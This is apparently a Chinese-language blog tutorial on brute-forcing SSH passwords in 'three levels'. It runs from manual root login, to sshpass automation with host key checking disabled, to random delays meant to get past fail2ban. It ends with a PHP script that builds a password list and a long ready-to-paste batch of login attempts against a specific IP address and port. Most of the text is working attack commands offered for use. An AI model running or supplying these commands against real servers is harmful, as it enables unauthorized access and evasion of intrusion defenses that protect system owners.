SSH 密码爆破的三层境界

第一层，手动输密码

手撸，地球人都知道的原始方式。

ssh -p 20026 [email protected]
# 参数说明
# -p 20026 指定 SSH 连接的端口 20026
# [email protected] 登录目标主机 38.148.243.111，以 root 用户身份

第二层，自动输密码

把密码字典枚举后，自动输入密码。

sshpass -p "0a9a8a8723aa" ssh -o StrictHostKeyChecking=no -p 20026 [email protected]
# 参数说明
# sshpass -p "0a9a8a8723aa" 用 sshpass 传递密码 0a9a8a8723aa
# -o StrictHostKeyChecking=no 忽略主机密钥检查（避免第一次连接时提示确认主机密钥）
# -p 20026 指定 SSH 连接的端口 20026
# [email protected] 登录目标主机 38.148.243.111，以 root 用户身份

第三层，模拟人行为

自动的程序加模拟人行为，应对 fail2ban 等。

sshpass -p "0a9a8a8723aa" ssh -o StrictHostKeyChecking=no -p 20026 [email protected] || { true; sleep $(echo "scale=2; $RANDOM/32768 + 1" | bc); }
# 参数说明
# sshpass -p "0a9a8a8723aa" 用 sshpass 传递密码 0a9a8a8723aa
# -o StrictHostKeyChecking=no 忽略主机密钥检查（避免第一次连接时提示确认主机密钥）
# -p 20026 指定 SSH 连接的端口 20026
# [email protected] 登录目标主机 38.148.243.111，以 root 用户身份
# || { true; sleep $(echo "scale=2; $RANDOM/32768 + 1" | bc); } 如果 ssh 失败，执行大括号内的命令：
#    true 确保错误时不会中止脚本
#    sleep 休眠0到32768之间小数点随机时间（1 到 2 秒之间，保留两位小数）

第三层加强版：代码生成密码字典

使用自己熟悉的代码生成代码，密码字典生成快速的跟上规则。

<?php
# 密码规则一：
# 0a9a8a8723a 为前缀，后缀字符为一个字符，为0-9或者a-z中的一个
# 枚举所有可能的密码
$prefix = "0a9a8a8723a";
$chars = array_merge(range('0', '9'), range('a', 'z'));
foreach ($chars as $c) {
    $s = 'sshpass -p "%s" ssh -o StrictHostKeyChecking=no -p 20026 [email protected] || { true; sleep $(echo "scale=2; $RANDOM/32768 + 1" | bc); }';
    echo sprintf($s, $prefix . $c) . PHP_EOL;
}
echo PHP_EOL;

# 密码规则二：
# 0a9a8a8723a 为前缀，后缀字符集，包含数字 0-9 和小写字母 a-z
# 枚举所有可能的两位字符密码
$chars = array_merge(range('0', '9'), range('a', 'z'));
foreach ($chars as $char1) {
    foreach ($chars as $char2) {
        $password = $prefix . $char1 . $char2;
        echo $password . PHP_EOL;
    }
}

输出如下，复制粘贴Shell批量执行

sshpass -p "0a9a8a8723a0" ssh -o StrictHostKeyChecking=no -p 20026 [email protected] || { true; sleep $(echo "scale=2; $RANDOM/32768 + 1" | bc); }
sshpass -p "0a9a8a8723a1" ssh -o StrictHostKeyChecking=no -p 20026 [email protected] || { true; sleep $(echo "scale=2; $RANDOM/32768 + 1" | bc); }
sshpass -p "0a9a8a8723a2" ssh -o StrictHostKeyChecking=no -p 20026 [email protected] || { true; sleep $(echo "scale=2; $RANDOM/32768 + 1" | bc); }
sshpass -p "0a9a8a8723a3" ssh -o StrictHostKeyChecking=no -p 20026 [email protected] || { true; sleep $(echo "scale=2; $RANDOM/32768 + 1" | bc); }
sshpass -p "0a9a8a8723a4" ssh -o StrictHostKeyChecking=no -p 20026 [email protected] || { true; sleep $(echo "scale=2; $RANDOM/32768 + 1" | bc); }
sshpass -p "0a9a8a8723a5" ssh -o StrictHostKeyChecking=no -p 20026 [email protected] || { true; sleep $(echo "scale=2; $RANDOM/32768 + 1" | bc); }
sshpass -p "0a9a8a8723a6" ssh -o StrictHostKeyChecking=no -p 20026 [email protected] || { true; sleep $(echo "scale=2; $RANDOM/32768 + 1" | bc); }
sshpass -p "0a9a8a8723a7" ssh -o StrictHostKeyChecking=no -p 20026 [email protected] || { true; sleep $(echo "scale=2; $RANDOM/32768 + 1" | bc); }
sshpass -p "0a9a8a8723a8" ssh -o StrictHostKeyChecking=no -p 20026 [email protected] || { true; sleep $(echo "scale=2; $RANDOM/32768 + 1" | bc); }
sshpass -p "0a9a8a8723a9" ssh -o StrictHostKeyChecking=no -p 20026 [email protected] || { true; sleep $(echo "scale=2; $RANDOM/32768 + 1" | bc); }
sshpass -p "0a9a8a8723aa" ssh -o StrictHostKeyChecking=no -p 20026 [email protected] || { true; sleep $(echo "scale=2; $RANDOM/32768 + 1" | bc); }
sshpass -p "0a9a8a8723ab" ssh -o StrictHostKeyChecking=no -p 20026 [email protected] || { true; sleep $(echo "scale=2; $RANDOM/32768 + 1" | bc); }
sshpass -p "0a9a8a8723ac" ssh -o StrictHostKeyChecking=no -p 20026 [email protected] || { true; sleep $(echo "scale=2; $RANDOM/32768 + 1" | bc); }
sshpass -p "0a9a8a8723ad" ssh -o StrictHostKeyChecking=no -p 20026 [email protected] || { true; sleep $(echo "scale=2; $RANDOM/32768 + 1" | bc); }
sshpass -p "0a9a8a8723ae" ssh -o StrictHostKeyChecking=no -p 20026 [email protected] || { true; sleep $(echo "scale=2; $RANDOM/32768 + 1" | bc); }
sshpass -p "0a9a8a8723af" ssh -o StrictHostKeyChecking=no -p 20026 [email protected] || { true; sleep $(echo "scale=2; $RANDOM/32768 + 1" | bc); }
sshpass -p "0a9a8a8723ag" ssh -o StrictHostKeyChecking=no -p 20026 [email protected] || { true; sleep $(echo "scale=2; $RANDOM/32768 + 1" | bc); }
sshpass -p "0a9a8a8723ah" ssh -o StrictHostKeyChecking=no -p 20026 [email protected] || { true; sleep $(echo "scale=2; $RANDOM/32768 + 1" | bc); }
sshpass -p "0a9a8a8723ai" ssh -o StrictHostKeyChecking=no -p 20026 [email protected] || { true; sleep $(echo "scale=2; $RANDOM/32768 + 1" | bc); }
sshpass -p "0a9a8a8723aj" ssh -o StrictHostKeyChecking=no -p 20026 [email protected] || { true; sleep $(echo "scale=2; $RANDOM/32768 + 1" | bc); }
sshpass -p "0a9a8a8723ak" ssh -o StrictHostKeyChecking=no -p 20026 [email protected] || { true; sleep $(echo "scale=2; $RANDOM/32768 + 1" | bc); }
sshpass -p "0a9a8a8723al" ssh -o StrictHostKeyChecking=no -p 20026 [email protected] || { true; sleep $(echo "scale=2; $RANDOM/32768 + 1" | bc); }
sshpass -p "0a9a8a8723am" ssh -o StrictHostKeyChecking=no -p 20026 [email protected] || { true; sleep $(echo "scale=2; $RANDOM/32768 + 1" | bc); }
sshpass -p "0a9a8a8723an" ssh -o StrictHostKeyChecking=no -p 20026 [email protected] || { true; sleep $(echo "scale=2; $RANDOM/32768 + 1" | bc); }
sshpass -p "0a9a8a8723ao" ssh -o StrictHostKeyChecking=no -p 20026 [email protected] || { true; sleep $(echo "scale=2; $RANDOM/32768 + 1" | bc); }
sshpass -p "0a9a8a8723ap" ssh -o StrictHostKeyChecking=no -p 20026 [email protected] || { true; sleep $(echo "scale=2; $RANDOM/32768 + 1" | bc); }
sshpass -p "0a9a8a8723aq" ssh -o StrictHostKeyChecking=no -p 20026 [email protected] || { true; sleep $(echo "scale=2; $RANDOM/32768 + 1" | bc); }
sshpass -p "0a9a8a8723ar" ssh -o StrictHostKeyChecking=no -p 20026 [email protected] || { true; sleep $(echo "scale=2; $RANDOM/32768 + 1" | bc); }
sshpass -p "0a9a8a8723as" ssh -o StrictHostKeyChecking=no -p 20026 [email protected] || { true; sleep $(echo "scale=2; $RANDOM/32768 + 1" | bc); }
sshpass -p "0a9a8a8723at" ssh -o StrictHostKeyChecking=no -p 20026 [email protected] || { true; sleep $(echo "scale=2; $RANDOM/32768 + 1" | bc); }
sshpass -p "0a9a8a8723au" ssh -o StrictHostKeyChecking=no -p 20026 [email protected] || { true; sleep $(echo "scale=2; $RANDOM/32768 + 1" | bc); }
sshpass -p "0a9a8a8723av" ssh -o StrictHostKeyChecking=no -p 20026 [email protected] || { true; sleep $(echo "scale=2; $RANDOM/32768 + 1" | bc); }
sshpass -p "0a9a8a8723aw" ssh -o StrictHostKeyChecking=no -p 20026 [email protected] || { true; sleep $(echo "scale=2; $RANDOM/32768 + 1" | bc); }
sshpass -p "0a9a8a8723ax" ssh -o StrictHostKeyChecking=no -p 20026 [email protected] || { true; sleep $(echo "scale=2; $RANDOM/32768 + 1" | bc); }
sshpass -p "0a9a8a8723ay" ssh -o StrictHostKeyChecking=no -p 20026 [email protected] || { true; sleep $(echo "scale=2; $RANDOM/32768 + 1" | bc); }
sshpass -p "0a9a8a8723az" ssh -o StrictHostKeyChecking=no -p 20026 [email protected] || { true; sleep $(echo "scale=2; $RANDOM/32768 + 1" | bc); }